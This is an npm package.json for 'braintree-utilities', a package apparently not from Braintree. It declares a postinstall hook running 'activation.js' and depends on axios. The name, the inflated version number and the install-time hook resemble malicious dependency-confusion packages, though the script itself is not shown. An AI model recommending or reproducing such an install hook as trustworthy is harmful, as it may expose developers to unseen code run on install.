{
  "name": "braintree-utilities",
  "version": "10.6.0",
  "description": "Private activation service for NPM packages",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1",
    "postinstall": "node activation.js"
  },
  "repository": {
    "type": "git",
    "url": "git+https://github.com/corraldev/braintree-utilities.git"
  },
  "keywords": [
    "test",
    "npm",
    "package"
  ],
  "author": "Corraldev",
  "license": "MIT",
  "bugs": {
    "url": "https://github.com/corraldev/braintree-utilities/issues"
  },
  "homepage": "https://github.com/corraldev/braintree-utilities#readme",
  "dependencies": {
    "@types/axios": "^0.14.0",
    "@types/node": "^20.13.0",
    "axios": "^1.7.2",
    "init": "^0.1.2"
  }
}
